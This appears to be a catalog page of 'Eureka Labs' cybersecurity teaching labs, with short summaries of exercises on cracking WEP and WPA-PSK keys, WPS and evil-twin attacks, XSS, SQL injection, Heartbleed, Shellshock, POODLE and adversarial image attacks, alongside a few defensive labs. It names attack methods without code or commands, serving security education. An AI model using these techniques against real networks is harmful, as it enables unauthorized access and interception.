Labs | Eureka Labs


WEP Cracking via Passive Listening The purpose of this lab is to understand and exploit the security vulnerabilities of an 802.11 WEP-secured network. You will passively collected enough WEP IV's (Initialization Vectors) to determine the WEP encryption key. After obtaining the key, you will need to masquerade as a legitimate WEP client on the network, access a server, and download a file. Fundamental mobile
WEP Cracking via Active Injection The purpose of this lab is to continue exploring the vulnerabilities of the 802.11 WEP security protocol. It is well-known that the WEP protocol is crippled with numerous security flaws. In the WEP Cracking via passive Listening lab in the Eureka series, we explored the methods of exploiting these flaws when a large amount of data was present. However, it is unlikely that a sufficiently large data stream is present on a network when in regular usage. This makes the relatively easy WEP crack from the Basic lab considerably more difficult. In this lab, we will use more efficient techniques to continue exploiting the WEP protocol. Fundamental mobile
WPA-PSK Key Cracking via Handshake Capture The first generation of the IEEE 802.11 Wired Equivalent Privacy (WEP) security standard was found to be vulnerable to various statistical weaknesses in the encryption algorithm. While at- tempts were made to correct the problem, it is still relatively simple to crack WEP and essentially obtain the password right out of thin air. As a result, the Wi-Fi Alliance created an interim stan- dard called Wi-Fi Protected Access (WPA). However, the WPA Pre-Shared Key (PSK) mode is crackable due to a flaw that exists in the au- thentication procedure. There is a human-friendly password and a user involved. Combined with the reality that most users select poor passwords, there is an opportunity that can be exploited. The TKIP cipher is not crackable, as it is a per-packet key. However, the initialization of the TKIP, which happens during client authentication, provides an opportunity to obtain the password. An effective way to crack WPA-PSK is to force a re-authentication of a legitimate client. By forcing an actively connected client to disconnect and reconnect, we can capture the WPA-PSK four-way handshake that protects the key exchange. A robust dictionary attack may take care of a lot of simple passwords. Consequently, it is potentially easier to crack WPA-PSK than it is to crack WEP, as we will discover in this lab. Fundamental mobile
"Unlock" Wi-Fi Protected Setup (WPS) Wi-Fi Protected Setup, or WPS, is a push-button authentication method for WPA2 Personal-secured networks. Have you ever been connecting to a network and seen an option underneath the ``Password" field that said ``Or push the button on the router to connect?" That is WPS at work. WPS relies mainly on physical security, or the idea that a potential attacker needs to be physically present to compromise the system. However, this lab will demonstrate how a remote WPS attack is still possible. Advanced mobile
Secure your WiFi with WPA2-Enterprise The purpose of this lab is to setup a WPA/WPA2 Enterprise (TKIP/AES + EAP-TTLS/PEAP) wireless network using FreeRadius and OpenWRT on a router. In addition, you will configure Linux/Windows/Android clients to connect to the network. Advanced mobile
Mobile Lab Platform for Users (Updated) In this document, we first will introduce how to create a user lab platform to perform activities for our Eureka labs. Next, we will exercise with a few important wireless related commands. Lastly, we will perform a rudimentary wireless network survey with these tools and commands. Fundamental mobile
"Hide-and-Seek" in Wireless In this basic lab, we will setup a simple wireless network with SSID hiding enabled. Students will be tasked to perform wireless network ``hide-and-seek'' (a simple wireless penetration test). Fundamental mobile
Mischievous MAC? Carrier Sense Multiple Access (CSMA) is a probabilistic media access control (MAC) protocol in which a node verifies the absence of other traffic before transmitting on a shared transmission medium. CSMA/CA (Collision Avoidance) is a protocol for carrier transmission in 802.11 networks. In this lab, we will observe how traffic is regulated by CSMA/CA. With this knowledge, we can detect abuses and misbehavior targeted at CMA/CA at the MAC layer. Challenging mobile
Evil Twin AP Attacks and Prevention Evil twin is a malicious access point set up to copy the identity of a real access point, hence the name twin, in order to eavesdrop and steal sensitive information. This attack will trick unsuspected users to connect to it, and from there, the attacker can perform many other attacks like man-in- the-middle or phishing websites. Advanced mobile network
Passing on Passwords When passwords are compromised, they can lead to unintentional data access, putting users at risk. Fundamental network system
XSS Attack and Defense Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. Fundamental network
Take My Coin! A blockchain is a growing list of records, called blocks, that are linked using cryptography. Each block contains a cryptographic hash of the previous block, a timestamp, and transaction data. In this lab, we will exercise coin mining and block creation. Fundamental network
Identity Demystified In cryptography, a public key certificate, also known as a digital certificate or identity certificate, is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. Advanced network
Crypto Flickered! Length extension attacks can cause serious vulnerabilities when people mistakenly try to construct something like an HMAC by using hash(secret \|\| message)}. Many hash functions are subject to length extension. Such hash functions are built around a compression function and maintain an internal state, which is initialized to a fixed constant. Messages are processed in fixed-sized blocks by applying the compression function to the current state and current block to compute an updated internal state. The result of the final application of the compression function becomes the output of the hash function. A consequence of this design is that if we know the hash of an n-block message, we can find the hash of longer messages by applying the compression function for each block that we want to add. This process is called length extension, and it can be used to attack many applications of hash functions. Advanced system
Bleeding Heart The Heartbleed bug was a serious vulnerability in OpenSSL. The weakness allowed attackers to steal information that would be protected in normal conditions by the SSL/TLS encryption used to secure connections. The Heartbleed bug will take advantage of reading the memory of the systems protected by the exploitable versions of OpenSSL. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. Advanced network system
Not-so-Personal Data This document servers as a experiment guidance for the purpose of using Generative Adversarial Networks (GAN) on privacy attack and privacy protection. Challenging network
"Invisible" Surfing We all need safe access to the Internet to obtain information and communicate with friends free from technology-facilitated violent oenses such as cyberstalking and harassment. The learning objectives of this lab are for students to be aware of personal identifiable information. Students will experiment other technologies such as Virtual Private Networks (VPNs) that protect identify information via encryption. Advanced network system
Shell Shattered Shellshock is a security bug in the Unix Bash shell that could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. The bug causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environmental variables. Fundamental system
A “Leaky” Database SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Advanced system
This POODLE Bites! The Padding Oracle On Downgraded Legacy Encryption (POODLE ) attack, also known as CVE-2014-3566, is an exploit used to steal information from secure connections, including cookies, passwords and any of the other type of browser data that gets encrypted as a result of the secure sockets layer (SSL) protocol. It allows attackers to decrypt network traffic between a client and a server. Challenging network system
Intruder Hunt An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. Any intrusion activity or violation is typically reported either to an administrator or collected centrally using a security information and event management (SIEM) system. Advanced network system
Walls Have Ears The purpose of this lab is to inspired interests in mobile security by demonstrating the possibility of wireless tapping. We will explore some security vulnerabilities that are associated with wireless based VoIP services. For example, a third party may be able to intercept a phone conversation and replay it due to the openness of wireless communications. Fundamental mobile
Video Aficionado The purpose of this lab is to understand and exploit the vulnerabilities of ``open-access'' mobile data for privacy breaches. Typically, mobile devices such as smartphones have a set of rigorous access control mechanisms (e.g., formal permission requests to access personal information) to protect private or otherwise sensitive user data. As a result, these control mechanisms prohibit a third party (e.g., an app) from directly identifying private user information. However, not all mobile data is strictly prohibited for access, e.g., power consumption of a mobile device is considered to be non-sensitive. Subsequently, it is possible to infer private information from open-access data that is available to all apps. Challenging mobile
"Pixie and Dixie vs. Mr. AI": One-Pixel Attack The purpose of this lab is to understand and exploit vulnerabilities of deep neural networks used in Internet of Things (IoT). Image data and a trained deep neural network model are typically used to classify an image (e.g., facial recognition for authentication) on mobile and/or IoT devices. In this lab, you will prompted to pinpoint a vulnerable pixel such that changing this pixel will result in wrong classification prediction, which may confuse relevant security modules. Advanced mobile
WPA3-SAE: A Dragonfly Aims to Fix Wi-Fi’s Wings In January 2018, WPA3 is announced to be a replacement to WPA2. The WPA3 standard replaces the pre-shared key (PSK) exchange with Simultaneous Authentication of Equals (SAE) as defined in IEEE 802.11-2016 resulting in a more secure initial key exchange in personal mode. It is also claimed that WPA3 will mitigate security issues posed by weak passwords and simplify the process of setting up devices with no display interface. However, just one year since the launch of WPA3 and researchers have unveiled several serious vulnerabilities in the wireless security protocol that could allow attackers to recover the password of the Wi-Fi network. Advanced mobile
Same, Same But Encrypted: An Enhanced Open Wi-Fi Network Wi-Fi ``Enhanced Open'' is a new security standard for public networks based on Opportunistic Wireless Encryption (OWE). It provides encryption and privacy on open, non-password-protected networks in areas such as cafes, hotels, restaurants, and libraries. WPA3 and Wi-Fi Enhanced Open improve overall Wi-Fi security, providing better privacy and robustness against some known attacks. Advanced mobile
WPA-PSK Key Cracking with Pairwise Master Key Identifier In our Eureka Labs series, we have a lab that crack WPA-PSK key via tricking a legitimate client into re-transmitting the EAPOL 4-way handshake frames. Differently, in this attack lab, the capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. Advanced mobile

WEP Cracking via Passive Listening

The purpose of this lab is to understand and exploit the security vulnerabilities of an 802.11 WEP-secured network. You will passively collected enough WEP IV's (Initialization Vectors) to determine the WEP encryption key. After obtaining the key, you will need to masquerade as a legitimate WEP client on the network, access a server, and download a file.

Fundamental

mobile

WEP Cracking via Active Injection

The purpose of this lab is to continue exploring the vulnerabilities of the 802.11 WEP security protocol. It is well-known that the WEP protocol is crippled with numerous security flaws. In the WEP Cracking via passive Listening lab in the Eureka series, we explored the methods of exploiting these flaws when a large amount of data was present. However, it is unlikely that a sufficiently large data stream is present on a network when in regular usage. This makes the relatively easy WEP crack from the Basic lab considerably more difficult. In this lab, we will use more efficient techniques to continue exploiting the WEP protocol.

Fundamental

mobile

WPA-PSK Key Cracking via Handshake Capture

The first generation of the IEEE 802.11 Wired Equivalent Privacy (WEP) security standard was found to be vulnerable to various statistical weaknesses in the encryption algorithm. While at- tempts were made to correct the problem, it is still relatively simple to crack WEP and essentially obtain the password right out of thin air. As a result, the Wi-Fi Alliance created an interim stan- dard called Wi-Fi Protected Access (WPA). However, the WPA Pre-Shared Key (PSK) mode is crackable due to a flaw that exists in the au- thentication procedure. There is a human-friendly password and a user involved. Combined with the reality that most users select poor passwords, there is an opportunity that can be exploited. The TKIP cipher is not crackable, as it is a per-packet key. However, the initialization of the TKIP, which happens during client authentication, provides an opportunity to obtain the password. An effective way to crack WPA-PSK is to force a re-authentication of a legitimate client. By forcing an actively connected client to disconnect and reconnect, we can capture the WPA-PSK four-way handshake that protects the key exchange. A robust dictionary attack may take care of a lot of simple passwords. Consequently, it is potentially easier to crack WPA-PSK than it is to crack WEP, as we will discover in this lab.

Fundamental

mobile

"Unlock" Wi-Fi Protected Setup (WPS)

Wi-Fi Protected Setup, or WPS, is a push-button authentication method for WPA2 Personal-secured networks. Have you ever been connecting to a network and seen an option underneath the ``Password" field that said ``Or push the button on the router to connect?" That is WPS at work. WPS relies mainly on physical security, or the idea that a potential attacker needs to be physically present to compromise the system. However, this lab will demonstrate how a remote WPS attack is still possible.

Advanced

mobile

Secure your WiFi with WPA2-Enterprise

The purpose of this lab is to setup a WPA/WPA2 Enterprise (TKIP/AES + EAP-TTLS/PEAP) wireless network using FreeRadius and OpenWRT on a router. In addition, you will configure Linux/Windows/Android clients to connect to the network.

Advanced

mobile

Mobile Lab Platform for Users (Updated)

In this document, we first will introduce how to create a user lab platform to perform activities for our Eureka labs. Next, we will exercise with a few important wireless related commands. Lastly, we will perform a rudimentary wireless network survey with these tools and commands.

Fundamental

mobile

"Hide-and-Seek" in Wireless

In this basic lab, we will setup a simple wireless network with SSID hiding enabled. Students will be tasked to perform wireless network ``hide-and-seek'' (a simple wireless penetration test).

Fundamental

mobile

Mischievous MAC?

Carrier Sense Multiple Access (CSMA) is a probabilistic media access control (MAC) protocol in which a node verifies the absence of other traffic before transmitting on a shared transmission medium. CSMA/CA (Collision Avoidance) is a protocol for carrier transmission in 802.11 networks. In this lab, we will observe how traffic is regulated by CSMA/CA. With this knowledge, we can detect abuses and misbehavior targeted at CMA/CA at the MAC layer.

Challenging

mobile

Evil Twin AP Attacks and Prevention

Evil twin is a malicious access point set up to copy the identity of a real access point, hence the name twin, in order to eavesdrop and steal sensitive information. This attack will trick unsuspected users to connect to it, and from there, the attacker can perform many other attacks like man-in- the-middle or phishing websites.

Advanced

mobile network

Passing on Passwords

When passwords are compromised, they can lead to unintentional data access, putting users at risk.

Fundamental

network system

XSS Attack and Defense

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Fundamental

network

Take My Coin!

A blockchain is a growing list of records, called blocks, that are linked using cryptography. Each block contains a cryptographic hash of the previous block, a timestamp, and transaction data. In this lab, we will exercise coin mining and block creation.

Fundamental

network

Identity Demystified

In cryptography, a public key certificate, also known as a digital certificate or identity certificate, is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.

Advanced

network

Crypto Flickered!

Length extension attacks can cause serious vulnerabilities when people mistakenly try to construct something like an HMAC by using hash(secret || message)}. Many hash functions are subject to length extension. Such hash functions are built around a compression function and maintain an internal state, which is initialized to a fixed constant. Messages are processed in fixed-sized blocks by applying the compression function to the current state and current block to compute an updated internal state. The result of the final application of the compression function becomes the output of the hash function. A consequence of this design is that if we know the hash of an n-block message, we can find the hash of longer messages by applying the compression function for each block that we want to add. This process is called length extension, and it can be used to attack many applications of hash functions.

Advanced

system

Bleeding Heart

The Heartbleed bug was a serious vulnerability in OpenSSL. The weakness allowed attackers to steal information that would be protected in normal conditions by the SSL/TLS encryption used to secure connections. The Heartbleed bug will take advantage of reading the memory of the systems protected by the exploitable versions of OpenSSL. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content.

Advanced

network system

Not-so-Personal Data

This document servers as a experiment guidance for the purpose of using Generative Adversarial Networks (GAN) on privacy attack and privacy protection.

Challenging

network

"Invisible" Surfing

We all need safe access to the Internet to obtain information and communicate with friends free from technology-facilitated violent oenses such as cyberstalking and harassment. The learning objectives of this lab are for students to be aware of personal identifiable information. Students will experiment other technologies such as Virtual Private Networks (VPNs) that protect identify information via encryption.

Advanced

network system

Shell Shattered

Shellshock is a security bug in the Unix Bash shell that could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. The bug causes Bash to unintentionally execute commands when the commands are concatenated to the end of function definitions stored in the values of environmental variables.

Fundamental

system

A “Leaky” Database

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

Advanced

system

This POODLE Bites!

The Padding Oracle On Downgraded Legacy Encryption (POODLE ) attack, also known as CVE-2014-3566, is an exploit used to steal information from secure connections, including cookies, passwords and any of the other type of browser data that gets encrypted as a result of the secure sockets layer (SSL) protocol. It allows attackers to decrypt network traffic between a client and a server.

Challenging

network system

Intruder Hunt

An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. Any intrusion activity or violation is typically reported either to an administrator or collected centrally using a security information and event management (SIEM) system.

Advanced

network system

Walls Have Ears

The purpose of this lab is to inspired interests in mobile security by demonstrating the possibility of wireless tapping. We will explore some security vulnerabilities that are associated with wireless based VoIP services. For example, a third party may be able to intercept a phone conversation and replay it due to the openness of wireless communications.

Fundamental

mobile

Video Aficionado

The purpose of this lab is to understand and exploit the vulnerabilities of ``open-access'' mobile data for privacy breaches. Typically, mobile devices such as smartphones have a set of rigorous access control mechanisms (e.g., formal permission requests to access personal information) to protect private or otherwise sensitive user data. As a result, these control mechanisms prohibit a third party (e.g., an app) from directly identifying private user information. However, not all mobile data is strictly prohibited for access, e.g., power consumption of a mobile device is considered to be non-sensitive. Subsequently, it is possible to infer private information from open-access data that is available to all apps.

Challenging

mobile

"Pixie and Dixie vs. Mr. AI": One-Pixel Attack

The purpose of this lab is to understand and exploit vulnerabilities of deep neural networks used in Internet of Things (IoT). Image data and a trained deep neural network model are typically used to classify an image (e.g., facial recognition for authentication) on mobile and/or IoT devices. In this lab, you will prompted to pinpoint a vulnerable pixel such that changing this pixel will result in wrong classification prediction, which may confuse relevant security modules.

Advanced

mobile

WPA3-SAE: A Dragonfly Aims to Fix Wi-Fi’s Wings

In January 2018, WPA3 is announced to be a replacement to WPA2. The WPA3 standard replaces the pre-shared key (PSK) exchange with Simultaneous Authentication of Equals (SAE) as defined in IEEE 802.11-2016 resulting in a more secure initial key exchange in personal mode. It is also claimed that WPA3 will mitigate security issues posed by weak passwords and simplify the process of setting up devices with no display interface. However, just one year since the launch of WPA3 and researchers have unveiled several serious vulnerabilities in the wireless security protocol that could allow attackers to recover the password of the Wi-Fi network.

Advanced

mobile

Same, Same But Encrypted: An Enhanced Open Wi-Fi Network

Wi-Fi ``Enhanced Open'' is a new security standard for public networks based on Opportunistic Wireless Encryption (OWE). It provides encryption and privacy on open, non-password-protected networks in areas such as cafes, hotels, restaurants, and libraries. WPA3 and Wi-Fi Enhanced Open improve overall Wi-Fi security, providing better privacy and robustness against some known attacks.

Advanced

mobile

WPA-PSK Key Cracking with Pairwise Master Key Identifier

In our Eureka Labs series, we have a lab that crack WPA-PSK key via tricking a legitimate client into re-transmitting the EAPOL 4-way handshake frames. Differently, in this attack lab, the capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

Advanced

mobile

Categories

Levels

All Labs

WEP Cracking via Passive Listening

WEP Cracking via Active Injection

WPA-PSK Key Cracking via Handshake Capture

"Unlock" Wi-Fi Protected Setup (WPS)

Secure your WiFi with WPA2-Enterprise

Mobile Lab Platform for Users (Updated)

"Hide-and-Seek" in Wireless

Mischievous MAC?

Evil Twin AP Attacks and Prevention

Passing on Passwords

XSS Attack and Defense

Take My Coin!

Identity Demystified

Crypto Flickered!

Bleeding Heart

Not-so-Personal Data

"Invisible" Surfing

Shell Shattered

A “Leaky” Database

This POODLE Bites!

Intruder Hunt

Walls Have Ears

Video Aficionado

"Pixie and Dixie vs. Mr. AI": One-Pixel Attack

WPA3-SAE: A Dragonfly Aims to Fix Wi-Fi’s Wings

Same, Same But Encrypted: An Enhanced Open Wi-Fi Network

WPA-PSK Key Cracking with Pairwise Master Key Identifier